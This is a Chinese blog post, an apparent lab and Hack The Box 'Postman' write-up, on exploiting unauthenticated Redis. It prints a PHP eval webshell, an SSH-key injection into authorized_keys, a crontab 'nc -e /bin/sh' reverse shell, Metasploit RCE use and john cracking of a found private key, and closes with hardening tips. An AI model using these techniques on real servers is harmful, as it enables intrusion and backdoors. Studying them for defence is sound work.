<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="Redis-PostmanAuthor:Xingg在做这个靶机的时候，没有进展就到了HTB的forum看到了其他成员给的提示是redis，于是我就查阅了redis常规操作手段，自搭靶机练习了redis提权，然后再上手postman">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis练习到HTB-Postman实战">
<meta property="og:url" content="http://yoursite.com/2020/03/18/Redis%E7%BB%83%E4%B9%A0%E5%B8%B8%E8%A7%84%E5%A7%BF%E5%8A%BF%E5%88%B0HTB%E5%AE%9E%E6%88%98postman_userflag/index.html">
<meta property="og:site_name" content="Xingg&#39;s Blog">
<meta property="og:description" content="Redis-PostmanAuthor:Xingg在做这个靶机的时候，没有进展就到了HTB的forum看到了其他成员给的提示是redis，于是我就查阅了redis常规操作手段，自搭靶机练习了redis提权，然后再上手postman">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113152612970.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113152708898.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113152837218.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113152908638.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153033882.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153048520.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153229184.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153244215.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153349180.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153455715.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153542138.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153604880.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153643569.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153759832.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153817442.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113153831782.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113154038565.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113154044351.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020011315405822.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020011315412423.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113154449318.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113154719445.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113154832990.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113154952242.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113155008597.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113155028604.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113155059614.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200113155136750.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2020-03-17T16:24:19.000Z">
<meta property="article:modified_time" content="2020-03-19T10:02:56.309Z">
<meta property="article:author" content="Xingg">
<meta property="article:tag" content="vulnhub">
<meta property="article:tag" content="HTB">
<meta property="article:tag" content="kali">
<meta property="article:tag" content="web安全">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200113152612970.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/03/18/Redis练习常规姿势到HTB实战postman_userflag/"/>





  <title>Redis练习到HTB-Postman实战 | Xingg's Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Xingg's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/18/Redis%E7%BB%83%E4%B9%A0%E5%B8%B8%E8%A7%84%E5%A7%BF%E5%8A%BF%E5%88%B0HTB%E5%AE%9E%E6%88%98postman_userflag/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Xingg">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Xingg's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Redis练习到HTB-Postman实战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-18T00:24:19+08:00">
                2020-03-18
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E6%9C%BA-HTB/" itemprop="url" rel="index">
                    <span itemprop="name">靶机-HTB</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/linux/" itemprop="url" rel="index">
                    <span itemprop="name">linux</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/linux/%E6%95%B0%E6%8D%AE%E5%BA%93/" itemprop="url" rel="index">
                    <span itemprop="name">数据库</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Redis-Postman"><a href="#Redis-Postman" class="headerlink" title="Redis-Postman"></a>Redis-Postman</h1><p><strong>Author:Xingg</strong><br>在做这个靶机的时候，没有进展就到了HTB的forum看到了其他成员给的提示是redis，于是我就查阅了redis常规操作手段，自搭靶机练习了redis提权，然后再上手postman</p>
<a id="more"></a>

<p>实验环境<br>centOS：192.168.49.16<br>Kali：192.168.49.129</p>
<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>安装过程参考<a href="https://blog.csdn.net/buyueliuying/article/details/82316517" target="_blank" rel="noopener">https://blog.csdn.net/buyueliuying/article/details/82316517</a></p>
<p><em>centOS7：</em></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wget http://download.redis.io/releases/redis-4.0.11.tar.gz</span><br><span class="line">tar -xavf redis-4.0.11.tar.gz</span><br><span class="line"><span class="built_in">cd</span> redis-4.0.11/</span><br><span class="line">make PREFIX=/usr/<span class="built_in">local</span>/redis install</span><br><span class="line">make <span class="built_in">test</span></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113152612970.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200113152708898.png" alt="在这里插入图片描述"><br>说明安装没有问题<br>把redis.conf复制到.usr/local/redis下面去</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">cp /redis-4.0.11/redis.conf /usr/<span class="built_in">local</span>/redis</span><br><span class="line"><span class="built_in">cd</span> /usr/<span class="built_in">local</span>/redis</span><br><span class="line">修改一些配置 </span><br><span class="line">vim redis.conf</span><br><span class="line">daemonize yes //后台方式启动</span><br><span class="line"><span class="comment">#bind 127.0.0.1 //这一行一定要注释掉 否则只允许本地访问</span></span><br><span class="line">protected-mode no //关闭保护模式可以通过ip访问</span><br><span class="line">保存退出</span><br><span class="line"><span class="built_in">cd</span> bin/</span><br><span class="line">./redis-server ../redis.conf</span><br><span class="line">运行启动</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113152837218.png" alt="在这里插入图片描述"><br>然后本地运行客户端</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./redis-cli</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113152908638.png" alt="在这里插入图片描述"><br><em>Kali：</em><br>然后我们在kali机上也装上redis<br>然后启动客户端<br>./redis-cli –h192.168.49.16  -p 6379<br><img src="https://img-blog.csdnimg.cn/20200113153033882.png" alt="在这里插入图片描述"><br>nc也是可以的<br><img src="https://img-blog.csdnimg.cn/20200113153048520.png" alt="在这里插入图片描述"><br>到这 redis已经安装完成了</p>
<h2 id="常规姿势"><a href="#常规姿势" class="headerlink" title="常规姿势"></a>常规姿势</h2><p>当redis没有设置密码或者弱密码，有三种常规姿势获取shell</p>
<p><strong><strong>redis写一个webshell</strong></strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">flushall  //清空数据库</span><br><span class="line"><span class="built_in">set</span> 1 ‘&lt;?php <span class="built_in">eval</span>(<span class="variable">$_GET</span>[<span class="string">"123"</span>]);?&gt;’  //一句话写入数据库</span><br><span class="line">config <span class="built_in">set</span> dir /var/www/html  //数据库文件保存在web目录下</span><br><span class="line">config <span class="built_in">set</span> dbfilename shell.php  //数据库文件命名为.php</span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113153229184.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>去centOS下查看，发现这段php已经嵌入了<img src="https://img-blog.csdnimg.cn/20200113153244215.png" alt="在这里插入图片描述"><br>然后去访问发现，php已经被解析了<br><img src="https://img-blog.csdnimg.cn/20200113153349180.png" alt="在这里插入图片描述"><br><strong>redis写rsa秘钥</strong></p>
<p>首先自己本地生成一个空密码的rsa秘钥对</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t rsa</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113153455715.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">然后把公钥输入到redis的数据库里</span><br><span class="line">(<span class="built_in">echo</span> -e <span class="string">"\n\n"</span> ;cat id_rsa.pub;<span class="built_in">echo</span> -e <span class="string">"\n\n"</span> )&gt;temp.txt</span><br><span class="line">cat temp.txt |/usr/<span class="built_in">local</span>/redis/bin/redis-cli -h 192.168.49.16 -x <span class="built_in">set</span> rsa</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113153542138.png" alt="在这里插入图片描述"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">然后再登陆上redis修改存储redis的存储位置</span><br><span class="line">./redis-cli -h 192.168.49.16 -p 6379</span><br><span class="line">config <span class="built_in">set</span> dir /root/.ssh/</span><br><span class="line">config <span class="built_in">set</span> dbfilename authorized_keys</span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113153604880.png" alt="在这里插入图片描述"><br>这个时候就可以直接连接ssh了</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh 192.168.49.16</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113153643569.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><strong>通过crontab反弹shell</strong>（测试失败）<br>crontab是linux上的自动执行任务<br>通过修改crontab可以执行系统命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> 1 <span class="string">'\n\n*/1 * * * * nc -e /bin/sh 192.168.49.129 9001\n\n'</span> </span><br><span class="line">config <span class="built_in">set</span> dir /var/spool/cron/</span><br><span class="line">config <span class="built_in">set</span> dbfilename root</span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113153759832.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>但是在另一边shell迟迟没有弹过来<br>后来我去看了crontab的日志<br><img src="https://img-blog.csdnimg.cn/20200113153817442.png" alt="在这里插入图片描述"><br>意思是格式错误<br><img src="https://img-blog.csdnimg.cn/20200113153831782.png" alt="在这里插入图片描述"><br>这是我通过redis插进去的payload，无关数据太多，crontab无法执行 复现失败<br>但是我看到上网师傅们的博客有复现成功的，哪里出了问题还请多多指点</p>
<p><strong>防护加固手段</strong><br>1.修改conf文件，禁止使用高危命令<br>2.修改conf文件，重命名高危命令<br>3.以低权限运行redis（root权限运行风险太大）<br>4.登录redis设置验证密码<br>5.禁止外网访问（设置conf文件里的bind）<br>6. authorized_keys设置为400，加chattr ，.ssh/文件夹也加chattr</p>
<h2 id="RCE复现"><a href="#RCE复现" class="headerlink" title="RCE复现"></a>RCE复现</h2><p>可以利用msf中现有的RCE漏洞攻击模块<br><img src="https://img-blog.csdnimg.cn/20200113154038565.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200113154044351.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2020011315405822.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>如果是以root权限启动的redis那获取的直接是root权限<br><img src="https://img-blog.csdnimg.cn/2020011315412423.png" alt="在这里插入图片描述"></p>
<h2 id="HTB-postman实战"><a href="#HTB-postman实战" class="headerlink" title="HTB postman实战"></a>HTB postman实战</h2><p>在postman10.10.10.160这台机器中，<br>通过nmap已经扫描到了6379 redis端口，尝试提权<br><img src="https://img-blog.csdnimg.cn/20200113154449318.png" alt="在这里插入图片描述"><br>看到是4.X版本，本以为一个RCE就结束了，但是多次尝试均失败<br>然后用客户端连接 空口令直接连上了<br>这里用到了修改ssh秘钥</p>
<p>先查看一下dir 和 dbfilename<br><img src="https://img-blog.csdnimg.cn/20200113154719445.png" alt="在这里插入图片描述"><br>dir已经是.ssh目录了，dbfilename还需要改一下<br><img src="https://img-blog.csdnimg.cn/20200113154832990.png" alt="在这里插入图片描述"><br>然后把我们已经生成好的秘钥输入进去，然后save<br><img src="https://img-blog.csdnimg.cn/20200113154952242.png" alt="在这里插入图片描述"><br>然后就可以连上了<br><img src="https://img-blog.csdnimg.cn/20200113155008597.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>redis没有权限进入Matt目录<br>尝试提权<br>在.bash_history里发现了一个私钥的备份<br><img src="https://img-blog.csdnimg.cn/20200113155028604.png" alt="在这里插入图片描述"><br>我们尝试用ssh直接连接Matt，但是连接失败<br>但是有了私钥可以直接破解密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python3 /usr/share/john/ssh2john.py id_rsa.bak &gt;Matt.txt</span><br><span class="line">john --wordlist=Wordlist/rockyou.txt Matt.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200113155059614.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>成功爆破出Matt的密码<br>然后登陆 拿到userflag<br><img src="https://img-blog.csdnimg.cn/20200113155136750.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>欢迎师傅们指点</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/17/DC-8/" rel="next" title="DC-8">
                <i class="fa fa-chevron-left"></i> DC-8
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/18/HTB_Devel/" rel="prev" title="Devel">
                Devel <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Xingg</p>
              <p class="site-description motion-element" itemprop="description">记录一个网安民工日常迷惑操作 xingg051@163.com</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Redis-Postman"><span class="nav-text">Redis-Postman</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#安装"><span class="nav-text">安装</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#常规姿势"><span class="nav-text">常规姿势</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RCE复现"><span class="nav-text">RCE复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HTB-postman实战"><span class="nav-text">HTB postman实战</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Xingg</span>

  
</div>
<!--

  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>

-->



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
